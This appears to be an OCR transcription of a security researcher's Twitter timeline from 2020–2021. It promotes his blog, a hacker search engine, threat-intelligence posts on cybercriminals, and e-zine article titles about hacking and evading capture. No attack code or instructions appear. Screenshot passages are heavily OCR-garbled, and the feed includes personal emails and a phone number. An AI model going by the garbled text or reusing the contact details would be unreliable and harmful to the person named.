#CyberAttack #CyberSec #Threatintel #Threatintelligence 


22 *%2 


28 - Monday 


04:01 


Check this out! We're officially back! I’ve recently launched a high-profile project on 
the original https://t.co/fnswrm8KWP and guess what? As of today we have a fully 
working flagship search engine for hackers and security experts working. Enjoy! RT 


pls! 
21 
04:04 


Interested in receiving high-profile security news and research articles? Subscribe to 
our https://t.co/BTusMsPDol Official Security Newsletter - https://t.co/mITgfrpPEX 
#security #cybercrime #malware #CyberSecurity 

04:05 
Grab an account at our https://t.co/BTusMsPDol Official Security and Hacking Forum 
here - https://t.co/FwBdikRI1fF #security #cybercrime #malware #CyberSecurity 
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04:06 


Check out our official https://t.co/BTusMsPDol Wordpress blog here - 
https://t.co/YKvIULGwPu #security #cybercrime #Malware #CyberSecurity Stay 
tuned! 


*1 
04:11 


Have you heard of my Virtual Reality for Hackers Cybertronics project? Check out the 
technical specifications here - https://t.co/DJt4KUZzJd and donate today! #security 
#cybercrime #malware #CyberSecurity Stay tuned! 


October 


2 - Friday 


04:09 


Join me on Facebook for a Live Broadcast in two hours! - https://t.co/6bLLdzOCpC 
#security #cybercrime #malware #CybersecurityAwarenessMonth #CyberSecMonth 
#CyberSecurityMonth #ThreatHunting #Threatintel #Threatintelligence Cheers! 
Dancho. 


05:29 


Going live in 30 minutes! - https://t.co/6bLLdzOCpC #security #cybercrime 
#malware #CybersecurityAwarenessMonth #CyberSecMonth #CyberAttack 
#ThreatHunting #Threatintel #Threatintelligence Stay tuned! 


*1 
06:15 
Join me now! https://t.co/DVBGztbLsz 


3 - Saturday 


08:47 

RT @TantataSolution: El seguimiento de Cyber-Criminales de todo el mundo de mano 
de los profesionales que los investigan. #CyberCamp16 #Koo... 

9 - Friday 


03:30 


https://t.co/fnswrm8KWP - Search Engine for Hackers and Security Experts! #security 
#cybercrime #malware #CyberSecurity #CybersecurityAwarenessMonth 
#CyberAttack #CyberSecMonth #Threatintel #Threatintelligence #ThreatHunting 
Stay tuned! 
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30 - Friday 


07:37 


New Post - "Exposing Iran-based Hackers and Web Site Defacement Group’s Personal 
Web Sites Portfolio - Direct Technical Collection Download! Grab a Copy Today!" - 
https://t.co/xBtcwuiLOk #security #cybercrime #malware #ThreatIintel Stay tuned! 
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November 


11 - Wednesday 


04:31 


New Post - "Exposing Protonmail and Tutanota’s Illicit Abuse by Ransomware Gangs - 
A Compilation of Currently Active Ransomware-Themed Email Addresses" - 
https://t.co/ix1Z4tfvMw CC: @ProtonMail @TutanotaTeam #security #cybercrime 
#malware #Threatintelligence 


*2 
11:14 
Cheers! https://t.co/KssZUoPcnL 


11:15 
Great stuff! https://t.co/Q3IzkLHyoG 


19 - Thursday 


02:18 
If terrorism is a crime then cybercrime is a form of financial terrorism. 

*1 

02:20 

@deadlyembrace6 @ProtonMail @TutanotaTeam Point taken. For the record 
ProtonMail and Tutanota removed all the accounts. Cheers! 

*1 

06:26 

#NowPlaying - Future - Mask Off (Official Music Video) - https://t.co/gT14cAGOaG 
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07:05 


Christmas came early! | have a birthday this week and I'll be spending it with my 
folks doing research touching base with folks from the industry and about to start 
selling a unique hardware-based block-chain enable firewall appliance. Cheers! 


07:06 


Long story short - the unique UTM hardware based firewall appliance let’s you protect 
your home and corporate network using IDS/IPS including AV and honeypots and lets 
you earn crypto-currency in the process of detecting a threat. Appreciate that! 
Cheers! 


07:09 


I’ve been also trying to acquire - https://t.co/SSoKe9VBHr where I’ve received a 
proposition to buy the portal and launch a security community on it with no success. 
I’ve then found a way to launch a project on the original - https://t.co/fnswrm8KWP 
Cheers! 


07:10 


The work on - https://t.co/fnswrm8KWP which | undertook a few months ago basically 
consists of the development of a search engine for hackers which is now live and 
works with an additional Dark Web search engine which I'll release later today. 
Cheers! 


07:12 


We have a blog - https://t.co/T3YfdBnuVz forum - https://t.co/vnRCWY08qD including 
a newsletter - https://t.co/Li0AUnWHit Cheers! 


07:14 


The Web site - https://t.co/fnswrm8KWP is one of the World’s most popular Web sites 
for hackers and security experts since 1994 and it’s therefore a privilege and an 
honor to be running a project on the portal. Stay tuned! Cheers! 


07:15 


I’m still managing and running my personal - https://t.co/JTcqOaYgET which for the 
record has already received 5.6M page views since the original launch in December, 
2005 making it one of the security industry’s most popular security publications. 
Cheers! 


07:16 


I’m also running a commercial E-shop for threat intelligence deliverables and 
Technical Collection type of materials - https://t.co/8BKKLYQSBQB which you can check 
out and let me know what do you think. Cheers! 


07:17 


I’ve been also pretty active on Medium - https://t.co/GtWdP1FvOc by publishing a 
variety of articles in a variety of topics and areas which you can also check and let 
me know what do you think and actually follow me. Cheers! 
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*1 
07:19 


Remember Koobface which was basically the highlight of my career circa 2008-2013? 
Check out my Keynote at CyberCamp 2016 - https://t.co/q5iTxLwmK1 where | had the 
privilege to receive an invitation to present and stay tuned! Cheers! 

07:20 
#NowPlaying - Ariana Grande - God is a woman (Official Video) - 
https://t.co/vU4taYb6yQ 
07:25 


You can also go through a recent presentations portfolio - https://t.co/nNsXMPrGi0 
and actually invite me to present at your event by approaching me at 
dancho.danchev@hush.com including a recent interview - https://t.co/glQoxvUWSs 
Cheers! 


07:27 


Did you know that in a previous life | was supposed to work with HBGary? - 
https://t.co/SRSiIBRVJOh | can’t wait to see this happen. Stay tuned! Cheers! - CC: 
@Greghoglund 


20 - Friday 


03:53 


@cedricpernet In a separate world | was once the only individual singled out as a 
major threat intelligence and cybercrime research competitor. Cheers! 
https://t.co/a0YeOM1DZ4 


68 


Competitors 


® Identified Competitors iDefense Labs (US) 
Cyber Defense Agency (CDA) JET Intelligent Risk Systems (US) 
(US) Informatica (US) 
Cyber Security Research and IT — Information Sharing and 
Development Center (US) Analysis Center (US) 
Cyveillance (US) iSIGHT Partners (US) 
Dancho Danchev (EU) Lookingglass (US) 
Department of Homeland Multi-State Information Sharing 
Security US-CERT(US) Analysis Center (US) 
Ernst & Young (EU) nCircle (US) 
EWA Information and SecureWorks (US) 
Infrastructure Technologies, Inc. Trend Micro (US) 
(US) United States Cyber 
Fortify (US) Consequence Unit (US) 
Global Security Mag (EU) 


03:58 
#NowPlaying - Zyce - Ayahuasca - https://t.co/5IEGGEO5TK 


04:00 


Great stuff! @ProtonMail and @TutanotalTeam removed all the ransomware email 
accounts which | provided here - https://t.co/ix1Z4tfvMw Cheers! #security 
#cybercrime #malware 


*1 


25 - Wednesday 


05:12 


The Inside Story Behind the Life of ex-Bulgarian Hacker Dancho Danchev - 
https://t.co/yowWUS37hM #security #cybercrime #malware #CyberSecurity 
#Threatintel #threatintelligence 


*1 
23:51 


Pre-Orders Accepted! - https://t.co/fnswrm8KWP Drop me a line at 
ddanchev@cryptogroup.net in terms of finding out the currently accepted payment 
options! Happy Holidays! Regards. Dancho. https://t.co/n79S1YjxX6c 
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Earn Crypto-Currency for 
catching the bad guys! 


https://fastalavista.box.sk - Pre-Order today! 


December 


1 - Tuesday 


01:43 


#NowPlaying - James Holden feat. Julie Thompson - Nothing (Original Mix) - 
https://t.co/tni0pcbZRV 


14:36 


New Post - "Exposing Emotet’s Modern Infrastructure - A Case Study on Tracking 
Down and Shutting Down Abusive Malware In Direct Cooperation with Abuse 
Departments" - https://t.co/9cfq9oruSc #security #cybercrime #malware 


5 - Saturday 


08:31 


Who wants to obtain private reader access to my - https://t.co/JIcqOaYgET starting as 
of January, 2021? #security #cybercrime #malware 


15 - Tuesday 


10:50 


Exclusive - "How | Got Robbed and Beaten and Illegally Arrested by a Local Troyan 
Gang in Bulgaria?"- https://t.co/ROiI2TGkcyz #security #cybercrime #malware 
#CyberAttack #CyberSecurity #Threatintel #ThreatHunting #Threatintelligence 


18 - Friday 


12:52 


We're online! Grab HexChat - https://t.co/svsi86esJb and join us at 
https://t.co/kxEf1MNiuX Regards. Dancho. #security #cybercrime #malware 
https://t.co/S8sUCrno9s 
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12:59 


Who’s online? #security #cybercrime #malware 


19 - Saturday 


09:59 
Amazon Kindle users! Check this out! - https://t.co/Ot8BkKZEgbG #security 
#cybercrime #malware 


<2 *1 
11:53 


@k8em0 | just came across to this "Top 10 Sexy Infosec Geeks of 2009" compilation - 
https://t.co/rRSTFqvaqyyY and it looks like | almost made the list. Check out the 
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comment here - https://t.co/evfs4iGkeb Regards. Dancho. 


*1 


21 - Monday 


09:24 


#NowPlaying - Ariana Grande - Santa Tell Me - https://t.co/FeveYVA11h Happy 
Holidays! God bless and let’s don’t forget about the rest! Cheers! Dancho 


09:31 


This is me presenting at RSA Europe 2012 on Cyber Jihad vs Cyberterrorism - 
Separating Hype from Reality. Here’s the PPT - https://t.co/h4jSOVOgHB Cheers! 
Dancho https://t.co/4hnHmOHEh] 


09:34 


Awesome! Grab a copy of my original Iran’s Hacking Ecosystem exposed report circa 
2015 from here - https://t.co/N8Onckjg5V and the second version of the research 
from here - https://t.co/x6UATSRiIC9 Stay tuned! https://t.co/VYcK8UCcYb} 


*1 
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09:36 
Remember Koobface? - https://t.co/oPmvq5vgpxX This is how it all began. Check out 
my Keynote presentation at CyberCamp 2016 here - https://t.co/q5iTxLwmK1 Stay 
tuned! https://t.co/axXLFmWOv6E 


me: +792199101900 


25 - Friday 


11:11 
hO hO hO! Merry Christmas folks! God bless and let’s don’t forget to nuke the rest. | 
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mean with high quality research and analysis. Keep up the good work and the spirit! 
Happy Christmas and New Year celebration. Stay tuned! https://t.co/u68KHRhBNI 


*1 


11:17 
@adamjodonnell Merry Christmas! - https://t.co/FeveYVA11h Cheers! Dancho. 


28 - Monday 


05:14 


Got time? Watch my Keynote at CyberCamp 2016 - https://t.co/q5iTxLwmK1 Cheers! 
Dancho 
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05:42 


Awesome! Check out this publication! - https://t.co/xMYaljchLC it’s a pleasure and an 
honor to have made the list of IOCs providers. Consider catching up in terms of what 
I’ve been up to at my personal blog - https://t.co/wEK5XX2J9Z Cheers! Dancho 
https://t.co/E8smulfMgp 


*2 
% of % of % of % of 
Blog covered covered timely robust 
IOCs iocterms IOCs 1OCs 
Dancho Danchev 42% 62% 14% 84% 
Naked Security 43% 55% 54% 45% 
THN 38% 38% 41% 51% 
Webroot 54% 719% 13% 84% 
ThreatPost 26% 37% 52% 29% 
TaoSecurity 57% 61% 31% 68% 
Sucuri 34% 35% 43% 52% 
PaloAlto 39% 44% 15% 87 % 
Malwarebytes 32% 48% 26% 72% 
Hexacorn 49% 57% 59% 76% 


715 
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2021 


January 


1 - Friday 


04:27 


Grab a copy today! - https://t.co/eVsxfo6tWx #security #cybercrime #malware Stay 
tuned! https://t.co/uunf8Sm93E 
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Webroot Inc. 


DANCHO DANCHEV’S 
SECURITY RESEARCH 
FOR WEBROOT INC. 


In-Depth Overview and Analysis 
of Security Blogger Dancho 
Danchev's Security Research for 
Webroot Inc. Circa 2012-2014 


04:28 


Check this out! Grab a copy today! - https://t.co/JXEO67Ucqw #security #cybercrime 
#malware Stay tuned! https://t.co/mkocjLA4Kk 
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2 - Saturday 


03:20 


“AN IN-DEPTH ANALYSIS OF HUNDREDS OF HIGH-PROFILE AND 

NEVER-PUBLISHED BEFORE SECURITY RESEARCH ARTICLES AND 

OSINT ANALYSIS BY THE WINNER OF JESSY H. NEAL AWARD FOR 

BEST BLOG FOR ZDNET'S ZERO DAY BLOG FOR 2010." - DANCHO 
DANCHEV 


DANCHO DANCHEV'S 
SECURITY RESEARCH 
PORTFOLIO FOR 


ZDNET'S ZERO DAY 
BLOG 


IN-DEPTH OVERVIEW AND ANALYSIS OF 
SECURITY BLOGGER DANCHO 
DANCHEV'S SECURITY RESEARCH FOR 
ZDNET'S ZERO DAY BLOG CIRCA 2008- 
2012 


BY DANCHO DANCHEV 


Who wants to join me on IRC? Grab a copy of https://t.co/I7DqVpdnXX and join me at 


*1 
08:49 


https://t.co/kxEf1MNiuX Stay tuned! Regards. Dancho 


I’m looking for a VR application developer. Who can assist here? Regards. Dancho 


*%2 
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6 - Wednesday 


12:54 


New Post - Exposing the Pay Per Install Underground Business Model - Historical 
OSINT - An Analysis - 2008 - https://t.co/E9qxtvqHXi #security #cybercrime 
#malware 


21 %1 


8 - Friday 


02:45 


Guess who's popular? Original source here - https://t.co/tzX8ADaTld #security 
#cybercrime #malware https://t.co/2IINX3eJyh 


*1 


Choose File to Upload 


QO) (i = How bao 


Organize © ae) Views © New Folder 
Nome = | 


Favonte Links 


9OTS741046 S.toad ho. exe FOTS741046_6 bad ghp.exe 


04:37 


This is me on Google Trends - https://t.co/DpYX6XgCIX Stay tuned! 
https://t.co/FwsS2C62qF 
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10:43 & Oo & & 


@ trends.google.com/tr 


Explore 


® Dancho Danchev 


Search term 


= Worldwide, 2004 - present 


Interest over time 


Interest by region Region v 


9 - Saturday 


04:13 


Folks check out my historical OSINT analysis of the pay per install market segment 
within the cybercrime ecosystem circa 2008 - https://t.co/E9qxtvqHXi Want to know 
who’s behind BakaSoftware? Check this out - https://t.co/yCfYp9r4VK 
https://t.co/coAmeWOSnE 
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13:34 


Hey @mikko check this out! | just came across to this reference that the C&amp;C 
server domain is registered using my name. Takes you back doesn’t it? Here’s the 
PPT - https://t.co/wMxlQCelSZ Cheers and thanks for the reference! Regards. Dancho 
https://t.co/j2NcCspnSz 
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Primary werves fol skilites Re 
Primary ip ediress 92 46.53.1890 


Last actified — 2011-03-09 11:55:26.0 
comin states ch - Mommal state. 


Seqieter cxeated, SKILLTEX 


10 - Sunday 
09:37 


Just did this! - https://t.co/J6eVOm1pmU Approach me at dancho.danchev@hush.com 


Cheers! Dancho. 
13:51 
Who wants to advertise? https://t.co/NE3YImt6nN 


Dancho Danchev's Blog - Mind Streams of Information Security Knowledge 
Views 


150K 
125K 5 36M 


100K 
75K 


50K 0 


25K 


Jan 2011 Jan Jan Jan Jan Jan Jan Jan Jan 
2012 2013 2014 2015 2016 2017 2018 2019 


13 - Wednesday 


02:29 
Anyon using Silent Circle? 


*1 
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05:25 


RT @netresec: Our #SUNBURST STAGE2 Victim Table (orgs actively targeted by the 
threat actor) has now been updated to include "paloaltonetwo... 


21 - Thursday 
07:57 

Anyone interested in inviting me to speak at their event? 
28 - Thursday 


09:36 


Anyone hiring? #security #cybercrime #malware #CyberSecurity #CyberAttack 
#Threatintelligence #Threatintel 


*1 
10:05 
This is me quoted in an article on the SUNBURST malware campaign - 
https://t.co/sTCEgEfm6a #security #cybercrime #malware 
February 
5 - Friday 
13:02 
New Post - Dancho Danchev’s Blog - Accepting Conference Invitations! - 
https://t.co/mam7hjU6PQ #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintelligence #Threatintel 
21 *%1 
13:03 


New Post - Rogue "Malware Spreading Security Researchers" Launch Malicious Social 
Engineering Campaign Against Legitimate Researchers - OSINT Analysis - 
https://t.co/XTwEOeJdFr #security #cybercrime #malware #CyberSecurity 

#cyberattacks 


*1 
13:04 


New Post - Can You Recognize These Guys? - https://t.co/x9kaXTLkTW #security 
#cybercrime #malware #CyberSecurity #cyberattacks #Threatintelligence 
#Threatintel 


21 %1 
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13:05 


New Post - FBI Shuts Down Radical Propaganda Online Web Sites - An OSINT Analysis - 
https://t.co/QqD6PDEyCb #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintel #ThreatIntelligence 


13:06 


New Post - Revisiting “Malware - Future Trends” - 10 Years Later - An Exclusive Peek 
Inside the Modern Cybercrime and Malware Ecosystem - An Analysis - 
https://t.co/wRUOhvs5m6 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #Threatintel 


22 *2 
13:07 


New Post - Exclusive Interview with https://t.co/K2zZ28aSWfB’s Primary Project 
Operator - Security Researcher - Dancho Danchev - https://t.co/RellUMZ2rB 
#security #cybercrime #malware #CyberSecurity #cyberattacks #Threatintel 
#Threatintelligence 


<1 *l 
13:08 


New Post - Introducing https://t.co/X2z28aSWfB’s - “How to Get in Touch with the KGB 
- The Definite Hacker’s Manual” Online Manual - https://t.co/OMiphwumQ] #security 
#cybercrime #malware #CyberSecurity #cyberattacks #Threatintel 
#Threatintelligence 


13:19 
New layout - https://t.co/fnswrm8KWP 
13:22 
@threatresearch You're welcome. Stay tuned! 
*1 
13:32 


@viralpoetry @hackermaderas @securitytrails @dragosr @TheRealSmuggler I’m 
alive and kicking. The best is yet to come. God bless and let’s don’t forget about the 
rest. Catch up here - https://t.co/JTcqOaYgET and https://t.co/fnswrm8KWP Cheers! 


Dancho 
*1 
13:36 
RT @packet_storm: Dancho Danchev Launches New Uncle George Initiative 
https://t.co/V76QMHkKXkH #news 
13:38 


RT @CybercampEs: ;Te vas a perder las keynotes de Dancho Danchev y 
@jaimeblascob en #CyberCamp16? No dejes pasar esta oportunidad https://t... 
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6 - Saturday 


02:17 


| have an upcoming first issue of - https://t.co/fnswrm8KWP’s "Wisdom Kings" E-Zine. 
Who wants to contribute with an interview or an article? 


el 
02:20 
In the first issue all articles are contribute by me and I’m currently looking for 


contributors in the form of an interview or an article. Who’s interested? 
https://t.co/mFuYy9y92d 
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+-+-+-+ Wisdom Kings Magazine Issue One - “Existence is Futile, Relevance Is Non-Existent”™ +-+-+-+ 


EEE HE EEE EEE EEEEFE EHH EE HHEE EEE FEHHEEE EHH EEHEHE EEE EEFHEEHEHEELHESE E+E EE++EEHH+EE+HEEE E+E EEALE+HE+OE ES 


OR. THEFODUCTION,. .ccoccccccccccccccccveccessescececccers by Phemonix 
G2. 20. years Peek Uh Te THM Ose ccciccccuscccwerecesees by Phemonix 
GOZ.. BECK. EO DESICS ecccncncecoscecsasccesseccoveeseseoce by Phenomix 
03. The basics of Social engineering.......-.seeeeeeeees by Phenomix 
04. How to make anarchy for beginners..........0c2eeee05 by Phenomix 
OS. Now to hack for Tut cccccccccccccceccosccocesceccese by Phenomix 
06. The ultimate guide to getting a girlfriend.......... by Phenomix 
07. Exploiting the scene for fun and profit............. by Phenomix 
08. Hacking your school for fun and profit eee Phenomi x 
09. Exposing the “Data Leaks” Paradise.......... eee Phenom! x 
10. How mot to get “Caught”...... cece ee eseeeaee eee Phenomi x 


+ CYBERINT and Virtual SIGINT Exposed...........-0++0> ly Phenomix 
12. From Cybercrime to Multi-Billion Dollar Industry....by Phenomix 
13. The “Dark web” Exposed and Profiled......... ...by Phenomix 


14. Exposing the Bastards who stole the Scene... Phenomi x 
15. Top 20 Hacking Sites and Hacking Forums..... eee Phenomi x 
16. Greetz amd Shouts gO OUt T0....... 2c ccc ccc cccccccees Phenomix 
27. COMCIUSTON. oc cccccccsscccccssscscscesececcsscsececes Phenomi x 
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05:59 
Anyone looking to hire Security Blogger? 
10:26 
Who wants to advertise? https://t.co/980i15fNHS 
10:34 


Check this out! "The Inside Story Behind the Life of ex-Bulgarian Hacker Dancho 
Danchev" - https://t.co/kyl5GvScSi 


10:40 
Do you read my blog? Here’s the Amazon Kindle version - https://t.co/JT676NfPZI 


11:23 
Check out this interview with me - https://t.co/G1MgRZBOVG 


11:27 
Listen to this interview with me - https://t.co/WeXBlboxrA 
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11:30 
Guess who made the list - https://t.co/YSzc3xM1fl check out the comments! 


7 - Sunday 


09:16 
https://t.co/cTtpAbqDQF 


09:24 


" Accomplished ZDNet blogger Dancho Danchev is an independent security 
consultant, while Kevin Poulsen, senior editor at Wired News, was already widely 
known as a hacker before he made the jump." - https://t.co/QjuqFTKHB 7 


21*1 
09:29 


"But where the hell is Kim Zetter? Kevin Poulsen? Dancho Danchev? Arik Hessidahl? 
Hell | would even put Space Rogue on this list, who is not even a reporter justa 
security media critic." - https://t.co/ZOfStzfscE 


09:34 


"Authentic hardworking online investigators like the ShadowServer Foundation, Jart 
Armin of Host Exploit, Brian Krebs, Dancho Danchev, the Project Grey 
Goose volunteers" - https://t.co/DoZYWHUuma 


09:37 
https://t.co/tzX8ADaTld 


09:46 
Be the best. Nuke the rest. Cheers! Dancho https://t.co/CIhgFZfU7p 
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09:46 


https://t.co/SSoKe9VBHr https://t.co/INbIAEbDRmT 
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09:47 


I’m back! https://t.co/n1ILz45FFh 
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09:47 
In the news! https://t.co/jFresSI3jz 


HNNCast052110 


90 


09:47 


Cheers to my Canadian fan club! https://t.co/9ZVhplgOp} 


*1 
OW, oon 
SUCK MY DICK 
8 - Monday 
06:50 


Anyone looking to hire security blogger technical content writer freelance journalist 
ora reporter? #security #cybercrime #malware #CyberSecurity #cyberattack 


9 - Tuesday 


OSi5Z 
Who's using https://t.co/V6éqUsROUXxR? 
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14:10 


My official XMPP Jabber OMEMO ID for real-time communication is 
ddanchev@conversations.im drop me a message today! #security #cybercrime 
#malware #OSINT #Threatintel #infosec #cybersecurity 


*1 
La 7 


https://t.co/UZ6qVANXVF 


10 - Wednesday 


11:52 
xmpp:https://t.co/c6QFWt4vzP.sk@conference.conversations.im?join 


12:05 


| need a cyber security investor to help work with me for an upcoming project. Who's 
interested? #security #cybercrime #nalware #CyberAttack #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel 


12 - Friday 
19:19 
https://t.co/fnswrm8KWP 


*1 
19:19 


https://t.co/O6SeAzk1Gw 


19:20 
https://t.co/6dqoX6A0gM 


14 - Sunday 


12:35 
Who can donate? https://t.co/alPU4MOL4P 


17 - Wednesday 


09:57 
Conference photos! https://t.co/[AF4ADAQqD8 


1x1 
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09:58 
Conference photos! Part Two. https://t.co/5Vpw9r6t4Q 


11:22 


Trying to get more followers! RT pls! #security #cybercrime #malware 
#CyberSecurity #CyberAttack #CyberSecurityNews #cyberattacks #CyberSec 
#ThreatHunting #Threatintel 


18 - Thursday 


09:51 
Expecting a call from an investor! Wish me luck. https://t.co/vpTj8PrkKkv 
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12:44 


New Post - "Exposing Anonymous International’s Hacking Collective Online 
Infrastructure - An OSINT Analysis" - https://t.co/K5nLakKe9hD #security #cybercrime 
#malware 


21 %1 


21 - Sunday 


09:46 


My RSS feed - https://t.co/B6SPnTw7FO Rocking the boat as it’s been 2005! Add me 
to your RSS reader today! Stay tuned! https://t.co/gc07DavvOs 


*1 
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LEARN MORE om 


MIND STREAMS OF 
INFORMATION SECURITY 
KNOWLEDGE 


In the overwhelming sea of information, access to timety, insightful and independemt open 


Source imtelligence (OSINT) analyses is crucial for maintaining the necessary situational 
awareness to stay on the top of emerging security threats. This biog covers trends and fads, 
tactics and strategies, intersecting with third-party research, speculations and real-time 
CYBERINT assessments, all packed with sarcastic attitude 


a 


DAlQaeds AOsncho Oancher GE | Maen Reacting 
Exposing a Currently Active List of Cyber 
Jihad Themed Twitter Accounts - An OSINT 
Analysis 


22 - Monday 


09:16 


Got BitCoin? Check this out - https://t.co/DjegobOF3Wx #security #cybercrime 
#malware #CyberAttack #CyberSecurity #ThreatIntel 


25 - Thursday 
09:30 


Folks! | produced this today. Time to set them straight! - https://t.co/s6FMAh4BVN 
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#security #cybercrime #malware #CyberSecurity #Threatintel #Threatintelligence 
https://t.co/rgcO7Qplof 


21 *%1 
CEPBVICOB TENE®OHOB SBOHKOB sae CTAMMTb 
TENETPAMM AHOHUMHOCTbKIUEHTOB AMAZON 
PAYMENT AKKAYHTA MATASUHE tenerpam 


oenK PW ROXY DUMPS NMPOQAOKA PRICE «ynnio 
won Cham CTIOMNEP ORIGINICQMAPCEP __ 
weg C TVNNEP CIIAMEPbBINAPONEN omer 
avec CISCO AMEX OJIYDIEPbI dboseon 


TOBAPOB 
BITCOIN PNYOWUNKA DDoS WORDPRESS 


NOTH CKPUNTUHE YOUTUBE © CWEBMONEY 
maaHeP TIAPOSIUTAPAHT YuSBUMOCTb [fAPAHTA 
PACCBINKA ©nya"T CLOUDFLARE DOKYMEHTb! 


XOCTUMHT DEDICATED WESTERN 


09:31 
This is the last of the graphs. Drop me a line at dancho.danchev@hush.com in case 


you're interested in participating in my currently ongoing Law Enforcement and 
OSINT Operation called "Uncle George". Cheers! Dancho https://t.co/tHI7 9vcCAx 


*1 
Distribution of keywords (Frequency) 
soap pde CISCO 2.1% eon mKA 2.3% 


ORIGIN 2.3% 
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PAYMENT 1,7% ONYDEPb! 2.7% 
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AKKAYHTA 1.7% aera St 
oe ageorn 07% 
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NOMUH 1,6% 


CNAM 1.6% 
AMAZON 1.6% ~ 
TOBAPOB 1.6% MEPRARSE RISD .9% 
CEPBEPA 1.5% OBERT RED GE. 0.9% 
YySBUMOCTh 1.5% WPBUPYEb! 0.9% 
SSH 1,4% 4a seneSSAAR 2% 
: a CLOUDRAGROAT#¢1.1% 


TAPAHT 1,4% 
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’ POKYMEHTbI 1,2% 
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27 - Saturday 


00:07 


New Post - "Exposing FBI’s Most Wanted Cybercriminals - Omid Ghaffarinia a.k.a 
"Plus" - An OSINT Analysis" - https://t.co/HjCGW7Xmzf #security #cybercrime 
#malware #Threatintel #ThreatHunting 


00:09 


Folks! Big News! We now have a fully working Dark Web search engine featured on 
the front page at - https://t.co/fnswrm8KWP including a new layout! Stay tuned! 
https://t.co/GUPwPeOEMO 


21 %1 


22:10 


New Post - "Dancho Danchev’s Disappearance - 2010 - Official Complaint Against 
Republic of Bulgaria - Part Two" - https://t.co/q2ZS4lscnW #security #cybercrime 
#malware #CyberAttack #CyberSec #ThreatHunting #Threatintel 


28 - Sunday 


08:36 


New Post - "Dancho Danchev’s Law Enforcement and OSINT Operation "Uncle 
George" - An Update" https://t.co/JEZdAxmw07 #security #cybercrime #malware 
#CyberAttack #CyberSecurity #Threatintel 


24 %1 


March 


2 - Tuesday 


07:18 


Folks! Check out our flagship search engine for hackers and security experts on the 
front page at https://t.co/fnswrm8KWP where I’m currently running a high profile 
project including a fully working flagship Dark Web search engine. Stay tuned! 


21 *3 
a7 


07:28 


@TierSigma You’re most welcome! Keep up the good work and the feedback coming. 
Stay tuned! 


*1 


6 - Saturday 


07:33 


New Post - Exposing a Currently Active Portfolio of High-Profile Cybercriminal Email 
Addresses - Part Four - https://t.co/wQIlqKtsxbO #security #cybercrime #malware 
#CyberAttack #cyberattacks #Threatintel 


07:36 


New Post - "Exposing GRU’s Involvement in U.S Election Interference - 2016 - An 
OSINT Analysis" - https://t.co/XpRrj62SHA #security #cybercrime #malware 
#CyberAttack #cyberattacks #Threatintel 
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9 - Tuesday 


05:12 


New Post - "Exposing a Currently Active Portfolio of High-Profile Cybercriminal Email 
Addresses - Part Five" - https://t.co/XGk6pbXaf2 #security @cybercrime #malware 
#CyberSecurity #CyberAttack #cyberattacks #ThreatHunting #Threatintel 


21 *%1 
05:13 
New Post - "Exposing a Currently Active Portfolio of High-Profile Cybercriminal Email 


Addresses - Part Six" - https://t.co/5XKRSDTXxQ #security #cybercrime #malware 
#CyberSecurity #CyberAttack #cyberattacks #ThreatHunting #Threatintel 


22 *%1 
05:18 
New Post - "Exposing a Currently Active Portfolio of High-Profile Cybercriminal Email 


Addresses - Part Seven" - https://t.co/uwogqAB3jdh #security #cybercrime #malware 
#CyberSecurity #CyberAttack #cyberattacks #ThreatHunting #Threatintel 


21 *1 
05:39 

@CYBERCOM_DIRNSA @US CYBERCOM @NSAGov @gillibrandny @SenBobCasey 
Keep up the good work going! If it takes a FOIA request to show them how it’s done | 


would be checking the FOIA section every day - https://t.co/S9xqgwPm7q | recently 
did this article which might be informative - https://t.co/ixQXrZtuZm 
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08:39 


@zackwhittaker Supply chain malware attacks are nothing new and should be 
considered dangerous. Check out this analysis here - https://t.co/O3tnrwQbK7 


08:48 


@Treadstone71LLC @CityAM Crypto @Maylrmamay14 @CERAP Paris Jeff. Check this 
out - https://t.co/fRObK11tuUD ; https://t.co/p6siiRueVF ; https://t.co/iT9PtWbYvb ; 
https://t.co/9ncE73Xmé8f ; https://t.co/zeOrVIYvRA ; https://t.co/OeHLX9PkKOU ; 
https://t.co/uFPivg5tDg ; https://t.co/oS7kfZDojF ; https://t.co/z53voQWOWR 


10:21 
I’m back on Twitter! Stay tuned! RT pls! #security #cybercrime #malware 
#CyberSecurity #CyberAttack #ThreatHunting #ThreatIntelligence 
10:22 
The beauty of HD streaming over 3G, ah all the pixels, and how about the audience? 
Magnificent! +disseminated to all the right parties. #WTF 
10:23 


I’m proud to have been part of a team which constructively sets 
people/companies/products straight. Yeah, it’s so @ZDNet I’m talking about! 
#security #cybercrime #malware #CyberSecurity #CyberAttack #ThreatHunting 
#Threatintelligence 


22 *%1 
10:26 
Here’s a quick compilation which is Amazon Kindle compatible. This is basically all of 
my articles which | did for @ZDNet for a period of 4 years - https://t.co/JKEO67Ucqw 
Enjoy and stay tuned! 
10:27 


My experience with Team @Webroot? | can’t wait to meet all the folks with which | 
attended InfoSec 2012 in London. Remember my research back then? Grab a copy 
here - https://t.co/eVsxfo6tWx Cheers and stay tuned! 

10:28 


You see what | want you to see, you hear what | want you to hear, you do what | know 
you would do. Your entire existence is therefore a reflection of my desires. #OPSEC 
#SIGINT #OSINT #security #cybercrime #malware 
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10:30 


You killed the kid, now try to enjoy the adult. Who by the way happens to be one fine 
piece of work! :-) Check out the related posts here - https://t.co/q2ZS4|lscnw 


99 


10:31 


Beware the power of the rejected, uneducated, and socially insignificant waitress. 
#WTF 


10:31 
The old farts VS Generation | cybercrime fighters warfare, is currently taking place 
everywhere. Let the true professionals win! #security #cybercrime #malware 
10:31 


The day LE starts chasing down legitimate researchers, is the day when LE officially 
has no clue where the real criminals are. #BUSYness #security #cybercrime 


#malware 

10:32 

How do you fight hypocrisy and envy? With professionalism. #security #cybercrime 
#malware 

10:33 


Throughout my modest life experience, | came to the conclusion that bureaucrats 
exercising pSeudo-executive power. #WTF 
10:33 


When you talk and nobody listens, something’s conveniently wrong with everyone’s 
ears. #daily #dose #of #wisdom #security #cybercrime #malware 


el 
10:34 


I’m sorry but | can’t say I’m sorry for being young, talented, legitimate and single. 
Why? Cause it feels good! #security #cybercrime #malware 


10:34 
Sometimes, 90% of a LE case is solved, by simply asking. #security #cybercrime 
#malware 
10:34 


The more you like me, the more irrelevant | become. The more you hate me, the 
important | become. #security #cybercrime #malware 


10:35 


The reason why | possess high value postal stamp collections is fairly simple - you 
